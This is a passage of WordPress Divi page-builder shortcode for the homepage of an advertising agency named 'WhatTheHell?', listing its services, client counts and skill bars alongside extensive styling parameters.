button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" alt=\"Why We\" title_text=\"Why-we\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"-86px|||||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" title_text=\"217x434\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" 